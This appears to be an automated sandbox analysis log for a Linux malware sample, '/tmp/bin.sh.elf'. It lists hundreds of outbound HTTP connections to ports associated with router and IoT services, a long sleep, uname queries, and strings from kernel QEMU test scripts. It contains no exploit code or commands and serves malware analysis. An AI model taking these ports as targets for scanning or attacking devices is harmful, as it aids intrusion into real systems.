                            Source: unknownNetwork traffic detected: HTTP traffic on port 36494 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40718 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47836 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58078 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37408 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41302 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49044 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59020 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45758 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44922 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60122 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34468 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48102 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59254 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34102 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32814 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56438 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48340 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47496 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53256 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49434 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46748 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33270 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40366 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56406 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57186 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50112 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37318 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36252 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36602 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41056 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57340 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53394 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52308 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48580 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57690 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43540 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41842 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47926 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42954 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57150 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37892 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51244 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49652 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56356 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48634 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46862 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40496 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47696 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60760 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54142 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55938 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34524 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46350 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60808 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53368 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46238 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57654 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50436 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57660 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58408 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54100 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39352 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57032 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42286 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59878 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59072 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36370 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57452 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54752 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40410 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42296 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45458 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58124 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33168 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57308 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48772 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52072 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53342 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36572 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54682 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47518 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44058 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44086 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58964 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32956 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32846 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58148 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39906 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52340 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34242 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51622 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58788 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49260 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46258 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56786 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50770 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59614 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44048 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41670 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59578 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53194 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57944 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46288 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38750 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 32884 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36150 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54248 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55898 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55846 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35422 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48992 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54110 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45652 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43718 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37440 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60274 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43520 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45952 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39824 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49658 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34456 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39076 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41460 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42486 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55920 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59080 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59872 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45786 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44778 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37556 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35102 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35140 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46686 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41552 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47784 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40512 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60602 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60862 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56896 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54338 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47860 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44166 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51864 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40208 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51046 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41268 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55726 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59172 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36540 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34340 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37352 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55346 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50776 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54940 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47122 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44486 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58840 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46674 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38990 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51896 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52126 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56716 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39240 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42546 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38998 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37752 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54150 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54556 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51266 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59810 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37578 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36264 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52436 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39386 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56564 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58626 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40176 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55512 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58674 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43382 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34170 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41166 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37802 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54280 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59258 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33984 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43734 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51798 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34558 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44866 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35598 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59314 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57782 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47624 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48798 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40116 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34266 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58212 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45382 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56088 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57870 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39128 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53064 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60554 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36570 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33468 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52706 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55100 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53608 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35872 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56252 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41978 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56700 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37370 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51644 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51506 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54770 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35610 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60350 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34198 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56790 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34114 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33554 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52434 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50746 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33208 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44054 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33554 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35496 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39186 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51938 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42358 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40658 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58440 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57526 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33042 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43132 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34406 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50878 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56844 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51186 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33014 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34846 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46184 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57344 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44398 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39492 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44544 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53688 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35874 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53968 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39638 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51206 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42760 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35610 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38838 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48484 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44930 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37712 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50270 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57180 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47116 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 47506 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40328 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39586 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41248 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40478 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49160 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36648 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44150 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45808 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58012 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34136 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45174 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43734 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60696 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42392 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59238 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60700 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40836 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36944 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60498 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52086 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48902 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45506 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48024 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60818 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33240 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50162 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55058 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33722 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 34978 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 40148 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46192 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 35040 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50222 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46218 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48066 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44552 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42310 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54534 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37818 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38012 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58774 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56138 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49318 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43394 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58290 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39130 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42862 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49536 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60364 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53280 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45912 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 41670 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58262 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37798 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59820 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60076 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55364 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52192 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46216 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 56854 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58718 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45780 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50714 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50250 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37066 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 60938 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57056 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39988 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55502 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59368 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42634 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42602 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46142 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52932 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 52730 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 54392 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 81
                            Source: unknownNetwork traffic detected: HTTP traffic on port 46606 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 37888 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53124 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 57504 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45004 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 58658 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53394 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 50254 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 39032 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42888 -> 49152
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42164 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 55392 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43690 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 48402 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38460 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 51446 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49356 -> 52869
                            Source: unknownNetwork traffic detected: HTTP traffic on port 45566 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 36972 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42286 -> 7574
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44284 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 44378 -> 5555
                            Source: unknownNetwork traffic detected: HTTP traffic on port 53060 -> 37215
                            Source: unknownNetwork traffic detected: HTTP traffic on port 59644 -> 8443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 38484 -> 81
                            Source: /tmp/bin.sh.elf (PID: 6269)Sleeps longer then 60s: 600.0sJump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6237)Queries kernel information via 'uname': Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6241)Queries kernel information via 'uname': Jump to behavior
                            Source: /tmp/bin.sh.elf (PID: 6255)Queries kernel information via 'uname': Jump to behavior
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: echo Monitoring qemu job at pid $qemu_pid
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: ( $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append "$qemu_append $boot_args" > $resdir/qemu-output 2>&1 & echo $! > $resdir/qemu_pid; wait `cat $resdir/qemu_pid`; echo $? > $resdir/qemu-retval ) &
                            Source: functions.sh2.14.drBinary or memory string: qemu-system-ppc64)
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
                            Source: kvm.sh.14.drBinary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: echo Monitoring qemu job at yet-as-unknown pid
                            Source: kvm.sh.14.drBinary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
                            Source: functions.sh2.14.drBinary or memory string: identify_qemu_append () {
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: QEMU="`identify_qemu vmlinux`"
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$resdir/console.log"`"
                            Source: kvm.sh.14.drBinary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
                            Source: kvm-test-1-run.sh.14.drBinary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
